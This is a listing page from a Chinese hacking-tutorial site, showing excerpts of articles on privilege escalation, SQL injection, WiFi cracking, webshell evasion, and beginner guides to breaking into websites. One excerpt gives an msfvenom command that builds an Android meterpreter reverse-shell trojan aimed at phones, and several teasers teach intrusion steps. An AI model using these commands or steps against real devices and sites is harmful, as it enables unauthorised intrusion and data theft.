黑客技术教程学习基地 - CNHACK - 中文黑客网 黑客技术教程学习基地 - CNHACK - 中文黑客网

所有文章

渗透测试

漏洞分析:OpenVAS中的本地提权漏洞

6

中文黑客网 发布于 4-16

写在前面的话虽然本文涉及到的并非一个常见的场景,但如果在渗透测试过程中,你可以通过一个拥有sudo权限的用户来执行OpenVAS的话,你就可以利用本文介绍的技术来实现提权并拿到root。在这篇文章中,我们将介绍ixie关于OpenVAS工作流的内容,然后深入探讨如何利用其中存在的问题实现本地权限提升。OpenVAS工作流背景知识OpenVAS是目...

阅读(61) 评论(0 )

黑客技术

黑客报道:Chrome再次被曝0day漏洞

3

中文黑客网 发布于 4-16

一波未平一波又起,4月13日有安全人员在Twitter上公布了Chrome的0day漏洞PoC。该漏洞可以启动计算器应用程序,一时间好友圈里都被计算器刷屏了。但没想到仅隔一天,在4月14日,Chrome又被曝了第二个0day漏洞。并且其PoC同样也被安全人员在Twitter上公开。据悉,该漏洞影响了Chrome最新正式版(89.0.4389.12...

阅读(86) 评论(0 )

代码审计

php代码审计之PbootCMS漏洞审计

27

中文黑客网 发布于 4-12

PbootCMS漏洞审计一、环境准备下载地址:https://gitee.com/hnaoyun/PbootCMS/releases/V1.2.1解析域名:http://www.pboot.cms/这个系统很方便默认情况下,直接下载下来什么都不用做即可使用。(前提是开启phpsqlite扩展)我们将其改为mysql数据库使用。mysql新建数据库...

阅读(65) 评论(0 )

黑客技术

黑客技术学习:不同黑客入侵网站的基本步骤是什么?

1

中文黑客网 发布于 4-12

如何入侵指定网站,入侵网站应该有什么样的步骤,相信很多朋友都不知道黑客是如何入侵网站的,接下来黑客信息网来给大家科普科普不同的黑客都是怎么样去入侵网站的,首先入侵指定网站是需要条件的,入侵前一定要先观察这个网站是动态还是静态的。介绍下什么样站点可以入侵:我认为必须是动态的网站如ASP、PHP、JSP等代码编写的站点,如果是静态的(.htm或htm...

阅读(180) 评论(0 )

黑客新闻

领英5亿数据被黑客在暗网出售

3

中文黑客网 发布于 4-11

在Facebook5亿数据泄露事件发生后,近日,在某知名黑客论坛有黑客发帖出售5亿领英用户数据,并提供了200万数据记录作为证明。用户只要支付价值2美元的论坛积分就可以查看泄露的数据样本,黑客可能会以4位数字的比特币拍卖更大的5亿领英用户数据库。4个泄露的文件中包含有领英用户的信息,包括全名、邮件地址、手机号码、工作地址等信息。发帖者称数据是从领...

阅读(194) 评论(0 )

黑客技术

aircrack-ng无线网WIFI破解教程

11

中文黑客网 发布于 4-9

一直准备找个时间来写个wifi破解教程,因为很多人都想学wifi破解,但是网上的教程都太乱,而且弄来弄错容易错,那是对于wifi破解的原理没有充分的认识,这次准备纯码字给大家通俗的讲解wifi破解,破解工具以aircrack-ng为例,这是一个很强大且具有代表性的工具,网上很多其他的破解工具都是基于aircrack-ng的。名词解释无线AP:发射...

阅读(288) 评论(0 )

黑客技术

使用kali生成木马入侵安卓手机

7

中文黑客网 发布于 4-9

行动开始先查看kali的ip,我的是1.114 然后输入命令:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=你kali的ipLPORT=5555R>/root/apk.apk5555是设置的端口,可以自己更改  显示这个说明已经生成成功了 然后启动msf...

阅读(285) 评论(0 )

渗透测试

绕过白名单检查实现文件上传

28

中文黑客网 发布于 4-9

文件上传指将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。了解文件上传漏洞产生的原因,掌握漏洞的利用方法。预备知识1.  文件上传漏洞简介     通常web站点会有用户注册功能,而当用户登录之后大多数情况下会存...

阅读(77) 评论(0 )

黑客技术

从Web日志还原SQL注入拖走的数据

1

中文黑客网 发布于 4-8

利用SQL注入漏洞拖库,从而导致数据泄漏。一般的排查方式,我们可以使用关键字进行搜索,找到可疑的url尝试进行漏洞复现,通过Web访问日志来还原攻击路径,从而确定问题的根源。但是,有一个问题却一直困扰着我,攻击者通过SQL注入漏洞到底获取了什么数据?是所有的数据,还只是访问了其中的一张表?理论上,假设所有的url参数请求日志都记录完整的话,只需要...

阅读(79) 评论(0 )

黑客技术

常见网站劫持案例及解析

3

中文黑客网 发布于 4-8

攻击者在入侵网站后,常常会通过恶意劫持流量来获取收益,从而实现流量变现。有一些黑帽劫持的手法堪称防不胜防,正常的访问行为很难发现异常。今天给大家分享一下常见的网站劫持手法和排查思路。我们可以按照基于不同隐藏目的的常见劫持手法,来做一个简单的分类:1、将爬虫与用户正常访问分开,实现搜索引擎快照劫持2、将移动端与PC端的访问分开,实现移动端的流量劫持...

阅读(93) 评论(0 )

黑客技术

自主搭建的三层网络域渗透靶场打靶记录

62

中文黑客网 发布于 4-3

前言假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。目前此靶场已在vulnstack开源,下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/文中若有不当之处还请各位大佬多多点评我的博客:https://whoamianony...

阅读(94) 评论(0 )

黑客技术

2021年黑客攻防演练信息收集实战技巧

17

中文黑客网 发布于 4-3

前言攻防演练里最重要的环节莫过于信息收集,熟话说,要想打点打得好,信息收集少不了。在各大公司招兵买马之际,各位师傅也来查缺补漏,信息收集你真的都会了嘛?搜索引擎这里我们使用fofa来举例,为什么使用fofa来举例呢,不是因为fofa有多好(真香),是因为咱只买了fofa的会员。fofa既可以搜索到部分子域名,也可以搜索到目标的各种系统,如OA、后...

阅读(126) 评论(0 )

黑客技术

黑客技术webshell免杀的技巧

15

中文黑客网 发布于 3-27

0x00:前言由于杀软的规则在不断更新所以很多之前的过杀软方法基本上都不行了而且随着php7逐渐扩张assert马也将被淘汰所以本文将提出几种免杀思路效果很好而且不会被杀软的正则和沙盒规则约束。0x01:自定义加密Bypass部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则比如某dir+比如这个都能被检测出是shel...

阅读(172) 评论(0 )

黑客技术

黑客基本术语

中文黑客网 发布于 3-27

溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)社工:社会工程学一种通过对受害者心理弱点、本能反应、好奇...

阅读(172) 评论(0 )

黑客技术

新人零基础接触黑客知识的学习方法

中文黑客网 发布于 3-21

今天有许多人问我:“我看了你的文章了,但是我是新人,有没有什么学习方法啊?”我回答的是;“当然有啊,不过人和人不同,方法是自己总结出来的,就和我前面文章中介绍的名词一样,都是我在学习中根据自己的经验和对他的认识总结出来的。”下面呢我就把我自己的学习经验写出来给大家参考下,大家可以根据我的方法去总结套...

阅读(267) 评论(0 )

黑客技术

新手零基础黑客技术学习之上传漏洞

中文黑客网 发布于 3-21

上传漏洞是在一个ASP页面后面输入upfile.asp然后看回显,(注意一点:就是在加这个后缀前,把IE中友好显示关了!要不没有效果的!)如果没有显示或者出现个什么“请登陆后使用”这样的呢,就是没有漏洞的拉。那么有漏洞的回显是什么样子的呢?如果有漏洞你会看到上面有个这样的字  请先选择你要上传的文件[重新上传]如果看到这个...

阅读(120) 评论(0 )

黑客技术

新手零基础黑客技术学习之注入漏洞的利用

中文黑客网 发布于 3-21

上一节讲了暴库漏洞,现在来讲讲注入,现在注入漏洞简直多的和蚂蚁一样,随便找个站,就可能利用注入漏洞得到后台或者WEBSHELL,所以我们怎么能忽视这个漏洞呢?呵呵.下面就是介绍注入漏洞的用法。  在前面介绍过怎样辨别网站有注入漏洞,现在再来讲下,加深下印象,现在举的例子,比如我们检测的是这个站http://www.123.com/那么我们就先大概...

阅读(106) 评论(0 )

黑客技术

新手零基础黑客技术学习之利用暴库漏洞

中文黑客网 发布于 3-21

今天就来讲下以前的一个漏洞,但是很经典,现在也有不少网站仍然存在这样的漏洞。就是暴库漏洞。  什么是暴库呢?就是利用不正当的手段使对方把数据库的绝对路经显示出来,然后我门知道了绝对路径,就可以下载下来,这样这个网站的数据库中的资料就被我门轻松掌握了。  那么怎么样使用暴库呢?这个在新人2中有介绍,今天就来说说具体的用法。首先要知道怎样才能暴库呢?...

阅读(114) 评论(0 )

黑客技术

新手零基础黑客技术学习之入侵知识

中文黑客网 发布于 3-21

首先介绍下什么样的站点可以入侵:必须是动态的网站比如asp php jsp这种形式的站点后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0)  入侵介绍:1。上传漏洞2。暴库3。注入4。旁注5。COOKIE诈骗  1:上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHE...

阅读(129) 评论(0 )

渗透测试

CmsEasy 7.3.8 sql注入漏洞

5

中文黑客网 发布于 3-21

一、漏洞简介二、漏洞影响CmsEasy7.3.8三、复现过程漏洞代码位于lib/admin/language_admin.php的add_action函数在测试后发现CmsEasyV7.3.8框架已经对SQLi进行了转义和过滤,包括(select、*、sleep等等),为了确定具体的过滤名单,从源码中查找检测函数但是经过一番搜索后,源码中发现实际...

阅读(103) 评论(0 )

sitemap